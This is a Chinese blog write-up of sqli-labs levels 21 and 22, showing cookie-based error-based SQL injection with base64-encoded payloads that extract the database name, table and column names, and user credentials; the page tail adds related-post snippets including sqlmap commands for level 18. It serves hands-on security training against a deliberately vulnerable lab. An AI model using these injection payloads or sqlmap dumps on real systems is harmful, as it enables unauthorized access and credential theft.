sqli-labs第二十一/二十二关——POST-base64

已于 2025-05-22 14:10:30 修改
阅读量414 收藏 4
点赞数 10
文章标签: 数据库 sqli—labs 网络安全 表单 burpsuite
于 2025-05-22 14:06:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2403_88102829/article/details/148138785
版权

一:判断注入类型

先像前几关一样输入一组账户名和密码进行测试,得到如下回显

我们可以判断出来这一关还是在cookie上注入,把cookie的数据与前一关作对比

发现uname后面的参数被加密了,下面介绍一下

base64编码

1.概念:将二进制数据用64个可打印字符(A-Z,a-z,0-9,+,/)表示出来

 2.特征:等号(=)是填充字符,用于确保编码后的字符串长度是4的倍数

PS:‘=’ 在url解码之前是%3D

所以我们观察这一段参数:长度为4的倍数,并且以等号(%3D)补齐,所以高度怀疑是base64编码

base64在线加密解密(编码解码)encode、decode – 白盒子

尝试解码,结果和我们想的一样

所以我们用base64加密之后的代码来注入,在bp抓包的cookie里面改动是可以直接选中转换代码

快捷键ctrl-B

Cookie: uname=admin'——————YWRtaW4n
Cookie: uname=admin——————YWRtaW4=
Cookie: uname=admin"——————YWRtaW4i
Cookie: uname=admin')—————YWRtaW4nKQ==
Cookie: uname=admin")——————YWRtaW4iKQ==

只有‘)回显我们想要的报错(后者),尝试闭合 

闭合成功,判断正确,仍然尝试报错注入

二:开始注入

1.爆数据库名

Cookie: uname=MScpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChkYXRhYmFzZSgpKSkpIw==
——————
Cookie: uname=1') or extractvalue(1,concat(0x7e,(database())))#

2.爆表名

Cookie: uname=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))#
——————
Cookie: uname=1') and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))#

3.爆列名

Cookie: uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))#
——————
Cookie: uname=MScpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSlmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lPSd1c2VycycpKSkj

4.爆数据

首先判断列数

Cookie: uname=1') and extractvalue(1,concat(0x7e,(select count(*) from users)))#
——————
Cookie: uname=MScpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGNvdW50KCopIGZyb20gdXNlcnMpKSkj

仍然分两次得到数据

Cookie: uname=1') and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))#
——————
Cookie: uname=MScpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwgc3Vic3RyaW5nKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4M2EscGFzc3dvcmQpIGZyb20gdXNlcnMpLDEsMzIpKSkj


Cookie: uname=1') and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))#
———————
Cookie: uname=MScpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwgc3Vic3RyaW5nKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4M2EscGFzc3dvcmQpIGZyb20gdXNlcnMpLDMyLDMyKSkpIw==

 

ps:22将闭合方式改为双引号“即可 

 ❀❀❀  完结撒花!!!❀❀❀

 

Le_ee
关注
Sqli-labs-master超详细通教程(1-23基础篇)
备战秋招
06-12 3596
一到四主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
Sqli-labs靶场第21、22详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1284
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 19万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs第二十一二十二
m0_73248913的博客
02-17 351
sqlilabs第二十一二十二
sqli-labs全详解
Keeping it fresh at all times.
10-08 5155
为探讨清楚SQL注入的诸多细节,我们特以经典的sqli-labs进行从入门到进阶的强化训练。在做题过程中,作者进行了全面、详细、系统的总结,形成了sqli-labs的详细题解。
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
Jay17的博客
08-03 4万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
【sqlmap】sqli-labs速通攻略
m0_74824002的博客
12-09 724
ps:由于sqlmap生成的payload太长,暴字段和值的时候可能会有问题,暴值的时候可以一个字段一个字段注。使用了addSlashes()函数转义,正常会想到宽字节,但是此题是数字型,非引号类型注入,因此直接注就行。注意,因为该接口本身就是会对数据做更新的,因此使用sqlmap注入会导致数据被更新,密码会变为1。本题除了过滤了and or外,空格和#也被过滤。and和or用双写绕过,空格用%a0绕过,#用。,也就是cookie的值进行了base64编码,需要使用–tamper指定base64编码处理。
SQLi-labs-Master(1-22)新手通宝典
Myosotis_LL的博客
05-18 3069
欢迎来到《SQLi-labs-Master新手通宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs-master靶场通
m0_75208155的博客
08-12 1751
sqli-labs-master靶场通
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1943
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
SQL SERVER表中,找出一行数据的多列中的最大值
luckyext的博客
05-23 173
SQL SERVER表中,找出一行数据的多列中的最大值。使用values子句创建临时的数据集,将每行数据构造为只有一个字段的表,再求最大值。
并发编程艺术--并发编程挑战
qq_65779957的博客
05-23 299
实际上并不是并发执行就一定能比单线程执行速度更快,比如上下文切换,死锁以及资源受限等问题都会影响到并发的性能。下面我们来一一说明。
mysql日志文件binlog分析记录
王富贵的博客
05-22 279
根据binglog筛选update和delete,生成统计数据
canal实现mysql数据同步
最新发布
那些乐趣的博客
05-23 799
1、canal下载进入页面可以选择需要安装的版本下载canal.deployer-1.1.8.tar.gz和canal.admin-1.1.8.tar.gz2、mysql同步用户创建和授权在canal-admin解压文件的conf中有一个canal_manager.sql,导入到master数据库3、canal admin安装和启动把canal.admin-1.1.8.tar.gz上传到linux解压 tar -zvxf canal.admin-1.1.8.tar.gz。
【学生管理】期末练习题
呆萌很的博客
05-20 597
【学生管理】期末练习题
mysql底层数据结构
gp3056的博客
05-23 552
查看mysql文件页大小(16K)数据在磁盘上随机分布,不使用索引查找需要经过多次磁盘IO,索引的作用就是为了减少磁盘IO次数。
function calling简介
chris_linchen的专栏
05-20 245
函数调用是LLM(大型语言模型)与外部工具或API交互的键能力,通过微调LLM,使其能够识别何时需要调用函数,并从用户输入中提取参数,输出JSON格式的请求。这种机制使得LLM能够作为对话代理,有效利用外部工具回答问题,或将自然语言转换为API调用或数据库查询。使用示例包括定义一组工具(如获取天气信息的函数),并通过用户输入(如询问伦敦天气)触发LLM生成相应的函数调用请求。
C/C++ Select Poll Epoll 多路转接
2301_79618311的博客
05-20 896
缺点:1.需要自己手动管理文件描述符,在循环监听时,每次都需要手动设置fd集合。2.每次使用fd集合都需要将其从用户态拷贝到内核态3.select每次监听,都需要在内核态进行遍历所有fd4.select能监听的fd有限。缺点:1.每次内核需要轮询检测哪些事件就绪2.每次使用fd集合都需要将其从用户态拷贝到内核态3.随着监听fd的增多,每次可能只有几个fd就绪,效率会随着下降。优点:1.不需要在循环设置监听事件,接口使用更方便2.没有监听事件数量设置(但过多,性能也下降)
基于大模型的全面惊厥性癫痫持续状态技术方案
LCG元的博客
05-21 577
本文介绍了一个基于多模态数据和大模型的癫痫诊疗系统,涵盖从数据收集到术后护理的全流程。系统包括数据收集与预处理、大模型构建与训练、术前评估、术中决策支持、术后护理等多个模块。通过多模态数据集成和预处理,系统能够处理脑电图、影像学、实验室等多种数据。大模型采用Transformer架构进行多模态融合,支持癫痫发作风险预测和手术可行性评估。术中系统提供实时监测和麻醉方案优化,术后系统则进行短期预后预测和康复管理。此外,系统还包括技术验证方案和健康教育模块,确保诊疗效果和患者自我管理能力。
sqli-labs靶场sqlmap注入18
04-03
<think>好的,我现在需要帮助用户解决SQLi-Labs靶场第18使用sqlmap进行SQL注入的问题。首先,我得回顾一下用户提供的引用内容,特别是引用[5],里面提到了第18的解决方法。用户可能已经看过这个引用,但可能还需要更详细的步骤指导。 首先,我需要确认第18的具体情况。根据引用[5],第18是一个POST请求的注入点,涉及User-Agent头部的注入。用户需要使用sqlmap工具,并且需要先通过Burp Suite抓取数据包,保存为txt文件,然后在User-Agent字段中标记注入点。接着,使用sqlmap的-r参数指定数据包文件,并利用--current-db等参数获取数据库信息。 接下来,我需要将这个过程分解成清晰的步骤,确保用户能够一步步跟随。可能需要包括安装Burp Suite、配置代理、抓取数据包、保存文件、运行sqlmap命令等步骤。同时,用户可能需要知道如何设置代理,比如在浏览器中配置Burp Suite的监听地址和端口,以及如何处理HTTPS流量,如果需要的话。 另外,用户可能对sqlmap命令的参数不太熟悉,比如--tamper或--level等,需要解释这些参数的作用。例如,--level 2会增加测试的等级,覆盖更多的注入点。而--tamper可能在某些情况下需要,但根据引用[5],第18不需要tamper脚本,所以可能不需要用到这个参数。 还要注意用户可能遇到的常见问题,比如数据包保存的格式是否正确,User-Agent是否正确地标记了星号*,以及如何验证注入是否成功。例如,用户可能需要检查sqlmap的输出,确认是否成功获取到数据库名或其他信息。 另外,引用中提到第18的闭合方式是单引号',这可能意味着注入点是在User-Agent字段中使用单引号闭合的。因此,在构造payload时,sqlmap会自动处理这种闭合方式,用户不需要手动指定,但了解这一点有助于调试问题。 最后,用户可能需要一些额外的提示,比如如何提升注入的成功率,或者如何处理可能的WAF(Web应用防火墙)拦截。例如,使用--delay参数来减缓请求速度,避免被检测到,或者使用代理来隐藏流量。 总结来说,回答需要结构清晰,分步骤指导用户从抓包到运行sqlmap命令,解释键参数,并提供注意事项和常见问题解决方法,确保用户能够顺利通过第18。</think>### SQLi-Labs 第18sqlmap注入解决方案 根据引用[5]的描述,第18属于HTTP头部User-Agent字段的POST请求注入,需通过以下步骤实现自动化注入: **步骤1:准备环境** 1. 安装Burp Suite并配置浏览器代理(默认监听127.0.0.1:8080) 2. 访问第18页面`http://[靶机IP]/sqli-labs/Less-18/`,触发正常请求 **步骤2:抓取数据包** 1. 在Burp Suite的Proxy模块拦截HTTP请求 2. 在请求头中找到User-Agent字段,在值末尾添加`*`标记注入点 ```http User-Agent: Mozilla/5.0* # 添加*作为注入标识 ``` 3. 将完整请求包保存为`less18.txt` **步骤3:执行sqlmap命令** ```bash python sqlmap.py -r less18.txt --current-db --batch ``` - `-r`:指定包含HTTP请求的文件 - `--current-db`:获取当前数据库- `--batch`:自动选择默认选项 **步骤4:进阶利用** ```bash # 获取所有数据库 python sqlmap.py -r less18.txt --dbs --level=2 # 获取指定数据库表 python sqlmap.py -r less18.txt -D security --tables # 获取字段数据 python sqlmap.py -r less18.txt -D security -T users --dump ``` **键参数说明**: - `--level=2`:增加检测强度(默认检测范围不包括HTTP头部) - `--risk=3`:启用高风险测试模式(需谨慎使用) - `--tamper`:本不需要编码脚本,但复杂场景可配合`base64encode`等脚本[^3] **注意事项**: 1. 确保靶场环境配置正确,User-Agent字段存在注入漏洞 2. 若遇到过滤规则,可尝试`--tamper=space2comment`等绕过脚本 3. 数据包中的`*`必须紧接在User-Agent值之后,如:`User-Agent: payload*` 4. 推荐配合`--flush-session`参数避免缓存影响测试结果
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值